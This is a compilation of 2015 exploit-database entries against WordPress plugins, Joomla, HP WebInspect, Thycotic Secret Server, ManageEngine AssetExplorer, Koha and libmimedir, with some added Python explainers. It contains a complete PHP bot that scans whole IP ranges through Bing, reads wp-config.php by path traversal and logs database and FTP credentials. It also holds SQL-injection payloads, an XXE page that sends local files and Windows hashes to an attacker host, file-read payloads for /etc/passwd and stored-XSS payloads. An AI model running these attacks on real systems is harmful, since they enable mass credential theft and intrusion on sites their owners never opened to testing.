######################################################################################
# Exploit Title: Wordpress Plugin 'WP Mobile Edition' LFI Vulnerability              #
# Date: June 6, 2015                                                                 #
# Exploit Author: ViRuS OS                                                           #
# Google Dork: inurl:?fdx_switcher=mobile                                            #
# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/                  #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip  #
# Version:  WP Mobile Edition Version 2.2.7                                          #
# Tested on : windows                                                                #
######################################################################################
Description :
The plugin's css.php (wp-content/themes/mTheme-Unus/css/css.php) passes its "files" GET parameter to the filesystem without filtering, so a traversal payload returns wp-config.php, which holds the database credentials and the authentication salts. The four "../" steps climb from css/ through mTheme-Unus/, themes/ and wp-content/ to the WordPress root; if wp-config.php has been moved one directory above the web root (which WordPress supports), add a fifth.
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>

# Exploit Code :
<?php 
//ViRuS OS
set_time_limit(0);
error_reporting(0);
echo "############### Fdx_Switcher MiniBot By ip Range ##################\n\n";
print " Coded By        _                            
          __   _(_)_ __ _   _ ___    ___  ___ 
          \ \ / / | '__| | | / __|  / _ \/ __|
           \ V /| | |  | |_| \__ \ | (_) \__ \
            \_/ |_|_|   \__,_|___/  \___/|___/                                    
Greets >> CoderLeeT | Fallag Gassrini | Taz| S4hk | Sir Matrix | Kuroi'SH 
";
echo "Follow Me On FaceBook : https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook : https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Welcome Master ViRuS OS ################\n\n";
echo "Server Target IP : ";
$ip = trim(fgets(STDIN, 1024));
$octets = explode('.', $ip);
// first three octets: the whole /24 is walked below
$prefix = $octets[0].'.'.$octets[1].'.'.$octets[2];
$linkof = '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php';

for ($i = 0; $i <= 255; $i++) {
    $target = "$prefix.$i";
    // Bing's "ip:" operator lists the sites hosted on that address; bing() returns their URLs
    $un = array_unique(array_filter(array_map("site", bing("ip:$target wordpress"))));
    echo "[+] Scanning -> $target\n";
    echo "Found : ".count($un)." sites\n\n";
    foreach ($un as $pok) {
        $bda = "http://$pok";
        $file = @file_get_contents($bda.$linkof);
        if ($file !== false && stripos($file, 'DB_HOST') !== false && stripos($file, 'FTP_USER') === false) {
            echo "[+] Scanning => ".$bda."\n\n";
            $db   = "[+] DB NAME : ".findit($file, "DB_NAME', '", "');")."\n\n";
            $user = "[+] DB USER : ".findit($file, "DB_USER', '", "');")."\n\n";
            $pass = "[+] DB PASS : ".findit($file, "DB_PASSWORD', '", "');")."\n\n";
            $host = "[+] DB host : ".findit($file, "DB_HOST', '", "');")."\n\n";
            echo $db, $user, $pass, $host;
            // append the result to exploited.txt
            $save = fopen('exploited.txt', 'ab');
            fwrite($save, $bda."\r\n".$db."\r\n".$user."\r\n".$pass."\r\n".$host."\r\n");
            fclose($save);
        } elseif ($file !== false && stripos($file, 'DB_HOST') !== false) {
            // wp-config.php also carries FTP credentials: report those instead
            echo "FTP user : ".findit($file, "FTP_USER','", "');")."\n\n";
            echo "FTP pass : ".findit($file, "FTP_PASS','", "');")."\n\n";
            echo "FTP host : ".findit($file, "FTP_HOST','", "');")."\n\n";
        } else {
            echo $bda." : Exploit failed \n\n";
        }
    }
}

// substring between $starttag and $endtag; '' when either tag is absent
function findit($mytext, $starttag, $endtag) {
    $posLeft = stripos($mytext, $starttag);
    if ($posLeft === false) {
        return '';
    }
    $posLeft += strlen($starttag);
    $posRight = stripos($mytext, $endtag, $posLeft + 1);
    if ($posRight === false) {
        return '';
    }
    return substr($mytext, $posLeft, $posRight - $posLeft);
}

// hostname part of a result URL (null for relative links, filtered out above)
function site($link) {
    return parse_url($link, PHP_URL_HOST);
}

// scrape Bing result pages for $what; the two patterns match Bing's 2015 markup and may need updating
function bing($what) {
    $allLinks = array();
    for ($i = 1; $i <= 2000; $i += 10) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
        curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
        curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        $data = curl_exec($ch);
        curl_close($ch);
        preg_match_all('#;a=(.*?)" h="#', $data, $links);
        foreach ($links[1] as $link) {
            $allLinks[] = $link;
        }
        if (!preg_match('#"sw_next"#', $data)) {
            break;
        }
    }
    return array_unique(array_map("urldecode", $allLinks));
}
?>
=========================================================

[+] Title                :-   Pasworld detail.php Blind Sql Injection Vulnerability 
[+] Date                 :-   5  -  June  -  2015
[+] Vendor Homepage:     :-   http://main.pasworld.co.th/
[+] Version              :-   All Versions
[+] Tested on            :-   Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category             :-   webapps
[+] Google Dorks         :-   intext:"Powered By :: PAS World Communitcation" inurl:detail.php 
                              site:go.th inurl:"detail.php?id="
[+] Exploit Author       :-   Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name            :-   Team Alastor Breeze
[+] The official Members :-   Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to            :-   @@lu, Lalit, MyLappy<3, Diksha
[+] Contact              :-   fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com

=========================================================

[+] Severity Level          :- High
[+] Request Method(s)       :- GET / POST
[+] Vulnerable Parameter(s) :- detail.php?id=
[+] Affected Area(s)        :- Entire admin, database, Server

 
=========================================================

[+] About :-  Unauthenticated SQL Injection via "detail.php?id=" parameter
 
[+] SQL vulnerable File :- /home/DOMAIN/domains/DOMAIN.go.th/public_html/detail.php
 
[+] POC    :-  http://127.0.0.1/detail.php?id=[SQL]'

SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/detail.php?id=[SQL]" --dbs
++++++++++++++++++++++++++

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=152 AND 1414=1414

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=152 AND (SELECT 1163 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (CASE WHEN (1163=1163) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: id=-7470 UNION ALL SELECT 5982,5982,5982,5982,5982,CONCAT(0x7162766271,0x4b437a4a565555674571,0x7162707671),5982,5982,5982#



=========================================================
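The sqlmap output above shows a boolean-based blind injection point: id=152 AND 1414=1414 returns the record, a false condition returns an empty page. As an added example that is not part of the original advisory, the following Python reproduces that bug class against an in-memory SQLite table (constructed; not the vendor's code) and shows how a true/false oracle alone recovers database contents character by character. The table layout and the names page_has_record and blind_extract are assumptions of this example; the target runs MySQL, where the substr()/unicode() expressions become SUBSTRING()/ASCII().

```python
import sqlite3

# Constructed stand-in for the target's detail.php?id= query: the WHERE clause is
# built by string concatenation, which is the bug class sqlmap reported above.
# Not the vendor's code; it exists only so the inference loop has something to ask.
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.execute("CREATE TABLE detail (id INTEGER, title TEXT)")
_conn.execute("INSERT INTO detail VALUES (152, 'some record')")


def page_has_record(id_param: str) -> bool:
    """Boolean oracle: True when the page would render a record, False otherwise.
    Over HTTP this is the content/length difference between
    id=152 AND 1414=1414 (row shown) and id=152 AND 1414=1415 (empty page)."""
    rows = _conn.execute("SELECT title FROM detail WHERE id=" + id_param).fetchall()
    return len(rows) > 0


def sqlite_version_direct() -> str:
    """Ground truth for the demo: what the blind extraction should reproduce."""
    return _conn.execute("SELECT sqlite_version()").fetchone()[0]


def blind_extract(oracle, expression: str, max_len: int = 64) -> str:
    """Recover the string value of SQL `expression` one character at a time using
    only the oracle's yes/no answer. Each character costs about seven queries
    (binary search over code points 0..127) instead of one per candidate byte."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        # Narrow down the smallest c with unicode(substr(expr, pos, 1)) <= c.
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"152 AND unicode(substr(({expression}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so every comparison is false and the search collapses to 0: stop.
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print("oracle true/false:", page_has_record("152 AND 1414=1414"),
          page_has_record("152 AND 1414=1415"))
    print("DB version :", blind_extract(page_has_record, "sqlite_version()"))
    print("row data   :", blind_extract(page_has_record,
                                        "(SELECT title FROM detail WHERE id=152)"))
```

The binary search is what keeps blind extraction practical: a 30-character value costs roughly 210 requests rather than thousands, which is also why rate-based detection on the id parameter (many requests differing only in a numeric comparison) is effective.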
            
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|   Exploit Title: Milw0rm Clone Script v1.0 - (time based) SQLi                       |
|            Date: 05.19.2015                                                          |
|   Exploit Daddy: pancaker                                                            |
| Vendor Homepage: http://milw0rm.sourceforge.net/                                     |
|   Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download  |
|         Version: v1.0                                                                |
|       Tested On: Ubuntu 10.04                                                        |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
|   SHOUTout: milw0rm &&& your mums pancakes                                           |
| CALLINGout: hak5 {crap to the core} &&& 1337day/inj3ct0r {scamm3rs + l33ch3rs}       |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>




### vuln codez  related.php ###
<?
include("include/functions.php");

$related = htmlspecialchars(trim($_GET['program']));               <-- this isnt going to save u

$query = mysql_query("SELECT * FROM `exploits` WHERE `r`='".$related."'");   <- might as well b a straight get request lololol owned
$row = mysql_num_rows($query);
if($row){
?>
<html>
<head>
<title><? echo SiteInfo('site_name');?> - exploits : vulnerabilities : videos : papers : shellcode</title>
..zzz...





### manual ###

root@woop:~# zzz='10'
root@woop:~# lulz="program=hak5'%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP($zzz)))a)%20AND%20'shit'='shit"
root@woop:~# time curl "http://localhost/milw0rm/related.php?$lulz"

real    0m10.008s
user    0m0.004s
sys    0m0.004s






### sqlmap ###

root@woop:~/sqlmap# python sqlmap.py -u 'http://localhost/milw0rm/related.php?program=lol' --current-user --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-e8f87bf}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:46:53

[09:46:53] [INFO] resuming back-end DBMS 'mysql'
[09:46:53] [INFO] testing connection to the target URL
[09:46:53] [INFO] heuristics detected web page charset 'UTF-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: program (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mQUB'='mQUB

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: program=lol' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x77775a6355684c45565a,0x7176717671),NULL,NULL,NULL,NULL,NULL,NULL#
---
[09:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.12
[09:46:53] [INFO] fetching current user
current user:    'root@localhost'
[09:46:53] [INFO] testing if current user is DBA
[09:46:53] [INFO] fetching current user
[09:46:53] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True
[09:46:53] [INFO] fetched data logged to text files under '/root/.sqlmap/output/localhost'





<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|           >>> THIS 'EXPLOIT' IS SHIT LIKE ALL OF HAK5 'SHOWS' <<<          |
|             <<< NOT TO BE (RE)PUBLISHED ON 1337DAY/INJ3CT0R >>>            |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

                                   __
___________    ____   ____ _____  |  | __ ___________
\____ \__  \  /    \_/ ___\\__  \ |  |/ // __ \_  __ \
|  |_> > __ \|   |  \  \___ / __ \|    <\  ___/|  | \/
|   __(____  /___|  /\___  >____  /__|_ \\___  >__|
|__|       \/     \/     \/     \/     \/    \/
.........................cant be pr0 without ascii art 
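The htmlspecialchars() call in related.php does not prevent the injection because it is an HTML output encoder, not a SQL escaping function: with PHP's default flags before 8.1 (ENT_COMPAT) it leaves the single quote alone, so the quoted string literal in the query can still be closed. (PHP 8.1 changed the default to ENT_QUOTES, which happens to turn ' into &#039;, but that is a side effect of the output encoder, not a fix.) As an added example that is not part of the original advisory or of the Milw0rm clone script, this Python reproduces the vulnerable construction and the correct one side by side against an in-memory SQLite table; the rows and table layout are constructed, and related_vulnerable/related_fixed are this example's names.

```python
import html
import sqlite3

# Constructed rows standing in for the `exploits` table that related.php queries.
ROWS = [
    ("pineapple firmware bug", "hak5"),
    ("milw0rm clone script", "milw0rm"),
    ("some paper", "papers"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE exploits (title TEXT, r TEXT)")
    conn.executemany("INSERT INTO exploits VALUES (?, ?)", ROWS)
    return conn


def related_vulnerable(conn, program: str) -> int:
    """Same construction as related.php: HTML-escape the parameter, then paste it
    into the SQL text. quote=False reproduces PHP's pre-8.1 htmlspecialchars()
    default (ENT_COMPAT) for the single quote, which survives untouched, so the
    attacker can still close the string literal and append SQL."""
    related = html.escape(program.strip(), quote=False)
    sql = "SELECT * FROM `exploits` WHERE `r`='" + related + "'"
    return len(conn.execute(sql).fetchall())


def related_fixed(conn, program: str) -> int:
    """Bound parameter: the value travels separately from the SQL text and is
    never parsed as SQL, whatever characters it contains."""
    sql = "SELECT * FROM `exploits` WHERE `r`=?"
    return len(conn.execute(sql, (program.strip(),)).fetchall())


def demo() -> dict:
    conn = make_db()
    payload = "hak5' OR 'shit'='shit"      # closes the literal, adds a true clause
    return {
        "escaped_payload": html.escape(payload, quote=False),   # quote survives
        "normal": (related_vulnerable(conn, "hak5"), related_fixed(conn, "hak5")),
        "payload": (related_vulnerable(conn, payload), related_fixed(conn, payload)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the payload the vulnerable query returns every row while the parameterised one returns none, because the fixed version looks for a row whose r column literally equals the whole payload string.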
            
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate the free() calls
# that occur during the lexer's memory clean-up. This could lead to exploitable
# conditions, such as crafting a specific memory chunk to allow arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#

from struct import pack

def main():
    # bytes throughout, so the file written is identical under Python 2 and 3
    mime = b"begin:vcard<x\nx;type=x;type=x,"
    mime += pack("<Q", 0x4141414141414141)  # mdm->p
    mime += pack("<Q", 0x4242424242424242)  # mdm->next
    mime += b":x>x.l:x"
    mime += pack("<H", 0x0000)  # 2 x YY_END_OF_BUFFER_CHAR

    print("Writing free.vcf to local directory...")

    try:
        with open("free.vcf", "wb") as outfile:
            outfile.write(mime)

    except Exception as error:
        print("Error: %s\n" % error)
        return

    print("Done\n")

if __name__ == "__main__":
    main()
            
# Exploit Title: HP WebInspect - XML External Entity
# Date: 23/04/2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create a website that exploits the vulnerability.

1.1. Page that exfiltrates files using the out-of-band (OOB) technique:
1.1.1. Page that triggers the vulnerability (the scanner finds the form and parses the XML it carries):
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.1.2. file.xml, served from the attacker's host. It names the file to read and where to send its content. The &#37; in the nested declaration is the entity-encoded %: it is only turned into a real parameter-entity reference when %int; is expanded, by which time %payl; has already been replaced by the file's content, so the resulting declaration of "trick" carries that content in its URL:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Page that steals the hash of the Administrator user: a UNC path (\\attacker\...) in the entity declaration makes the scanning host authenticate to the attacker's SMB share:
1.2.1. Page that triggers the vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.2.2. On the attacker host, run a tool that captures the incoming SMB authentication (Responder or Metasploit's auxiliary/server/capture/smb, for example).

2. The payload fires when a vulnerable HP WebInspect version profiles or scans the prepared application: the scanner submits the form and parses the XML it contains with external entities enabled.
            
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: V5
# Tested on: Windows (Firefox), Linux (Firefox)
The affected file is f.php; its GET parameter "l" is vulnerable to local file inclusion.
f.php base64-decodes the parameter before using it, so the payload has to be base64-encoded, like this:
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

The request then looks like this:
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and the response contains the content of /etc/passwd.
Note that the first payload climbs three directories (robotcpa -> plugins -> wp-content) to reach the WordPress root. If f.php include()s the decoded value rather than reading it, wp-config.php would be executed instead of displayed; in that case prepend convert.base64-encode/ to the filter (php://filter/convert.base64-encode/resource=./../../../wp-config.php, base64-encoded again for "l") to retrieve its source.

greets to Black Sniper
Regards T3N38R15
            
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
 Description:
 proxy.php's code:
 <?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
proxy.php hands the unauthenticated "requrl" parameter straight to file_get_contents() and echoes a slice of the result. The script reads the target rather than including it, so PHP files come back as source instead of being executed; any local file the web server user can read is exposed, and since file_get_contents() also accepts URLs the server can be made to fetch arbitrary remote resources (SSRF). For a file that contains neither marker both strpos() calls return false, $left becomes 0 and $right becomes strlen($file), so the whole file is echoed.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url "http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd"
            
source: https://www.securityfocus.com/bid/53942/info

The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli] 
            
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID :   CVE-2015-3443
# Product:   Secret Server [1]
# Vendor:   Thycotic
# Subject:   Stored Cross-Site Scripting Vulnerability (XSS)
# Risk:    High
# Effect:   Remotely exploitable
# Author:   Marco Delai (marco.delai@csnc.ch)
# Date:   June 24th 2015
#
#############################################################


Introduction:
-------------
Thycotic Secret Server enterprise password management software allows 
the creation, management and control of critical passwords in one 
centralized, web-based repository [1]. 

The identified vulnerability (stored Cross-Site Scripting) allows the 
execution of JavaScript code in the browser of a valid user when they 
toggle the password mask on a specially crafted password. An attacker 
can, for example, prepare a specially crafted shared password which, 
when viewed by another user, steals every password the victim has 
access to. 


Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2]. 


Technical Details
--------------------
Exploiting the vulnerability only requires the following steps:
1. Create a new password entry within Secret Server with the following
   value: "Compass Security<script>alert("Compass Security")</script>"
2. Open the basic dashboard and toggle the password mask. The password 
   is retrieved from the server using an AJAX call and its value is 
   added straight to the page's DOM without validation. Thus, the 
   script included in step 1 is executed. 

Note that the payload defined in step 1 only executed in the basic 
dashboard view; the advanced dashboard encoded the password correctly. 
The Content-Security-Policy returned with the response does not help 
either: its script-src carries 'unsafe-inline' and 'unsafe-eval', so 
injected script is not blocked. Extract of the vulnerable exchange: 

  GET /SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&auditAction=unmask HTTP/1.1

  HTTP/1.1 200 OK
  Cache-Control: no-cache, no-store, must-revalidate
  Pragma: no-cache
  Content-Length: 62
  Content-Type: application/json; charset=utf-8
  Expires: -1
  [...]
  Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
  X-Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  X-UA-Compatible: IE=edge
  
  "Compass Security<script>alert(\"Compass Security\")</script>"
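The Content-Security-Policy header in the exchange above looks protective but is not: script-src carries 'unsafe-inline' and 'unsafe-eval', so the injected <script> runs regardless. As an added example that is not part of the Compass advisory or of Secret Server, the Python below parses a CSP header and reports whether it still permits inline script and eval, applying the rule that 'unsafe-inline' is ignored once a nonce or hash source is present. ADVISORY_CSP is assembled from the header shown; HARDENED_CSP is an assumed counter-example, not the vendor's fix.

```python
# Assembled from the Content-Security-Policy value in the response above.
ADVISORY_CSP = ("connect-src 'self'; font-src 'self'; frame-src 'self' sslauncher:; "
                "img-src 'self' data:; media-src 'self'; object-src 'self'; "
                "style-src 'self' 'unsafe-inline'; "
                "script-src 'self' 'unsafe-inline' 'unsafe-eval'")

# Assumed policy that would have blocked an injected <script> block (not the vendor's fix).
HARDENED_CSP = ("default-src 'self'; script-src 'self' 'nonce-d3adb33f'; "
                "object-src 'none'; base-uri 'self'")

HASH_OR_NONCE = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}.
    Directive names are case-insensitive; browsers honour only the first
    occurrence of a duplicated directive, so later ones are dropped here too."""
    policy = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if not tokens:
            continue
        policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def effective_script_sources(policy: dict):
    """script-src, or default-src as its fallback, or None when neither is set."""
    return policy.get("script-src", policy.get("default-src"))


def allows_inline_script(policy: dict) -> bool:
    """True when inline <script> blocks and inline event handlers may run.
    'unsafe-inline' is ignored by CSP Level 2+ browsers once a nonce or hash
    source is present, which is what lets the hardened policy pass."""
    sources = effective_script_sources(policy)
    if sources is None:
        return True                      # no script restriction at all
    keywords = {s.lower() for s in sources if s.startswith("'")}
    has_nonce_or_hash = any(k.startswith(HASH_OR_NONCE) for k in keywords)
    return "'unsafe-inline'" in keywords and not has_nonce_or_hash


def allows_eval(policy: dict) -> bool:
    sources = effective_script_sources(policy)
    return sources is None or "'unsafe-eval'" in {s.lower() for s in sources}


def csp_findings(header: str) -> list:
    """Findings a reviewer would raise against the header; empty list means none."""
    policy = parse_csp(header)
    findings = []
    if allows_inline_script(policy):
        findings.append("inline script allowed: stored XSS payloads execute despite the CSP")
    if allows_eval(policy):
        findings.append("'unsafe-eval' allowed: string-to-code sinks (eval, setTimeout) are open")
    if "default-src" not in policy:
        findings.append("no default-src: any fetch directive not listed is unrestricted")
    return findings


if __name__ == "__main__":
    for name, hdr in (("advisory", ADVISORY_CSP), ("hardened", HARDENED_CSP)):
        print(name, csp_findings(hdr) or ["no findings"])
```

A CSP only backs up output encoding; the real fix remains encoding the password value before it is inserted into the DOM, which is what the advanced dashboard already did.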
  

Remediation:
------------
Update Secret Server to the latest version, which fixes the
vulnerability [2]. 


Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure


References:
-----------
[1] http://thycotic.com/products/secret-server/
[2]
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
            
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability


CVE-ID:
====================================
CVE-2015-2169


CVSS:
====================================
3.5


Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.

(Homepage: https://www.manageengine.com/products/asset-explorer/ )


Abstract Advisory Information:
==============================
A stored cross-site scripting attack can be performed against ManageEngine
AssetExplorer. If the 'Publisher' value of an installed program (read from the
Windows registry when an endpoint is scanned) contains script, that script is
executed in the browser of whoever views the scanned software list.


Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)


Severity Level:
====================
Medium


Technical Details & Description:
================================
1. Add a program entry whose Publisher value contains a script to the registry of an endpoint.
2. Log in to the product.
3. Scan the endpoint whose registry was modified.
4. In the right pane, go to Software -> Scanned Software.

The script gets executed.

Vulnerable Product(s):
ManageEngine Asset Explorer

Affected Version(s):
Version 6.1.0 / Build Number 6112
(earlier versions were not tested)

Vulnerability Type(s):
Persistent Cross Site Scripting


PoC:
=======================
Add the following registry entry (a .reg file; the Publisher value carries the payload) on the target machine:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"


Security Risk:
==================
Medium.


Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)


Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
            
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632



### CVE-2015-4632 ### 

#### Title: ####
Directory traversal

#### Type of vulnerability: ####
File Path Traversal

##### Exploitation vector:
Injecting into the "template_path" parameter of /cgi-bin/koha/svc/virtualshelves/search and /cgi-bin/koha/svc/members/search

##### Attack outcome:
Read access to arbitrary files on the system

#### Impact: ####
high (scale: low, medium, high, critical)

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
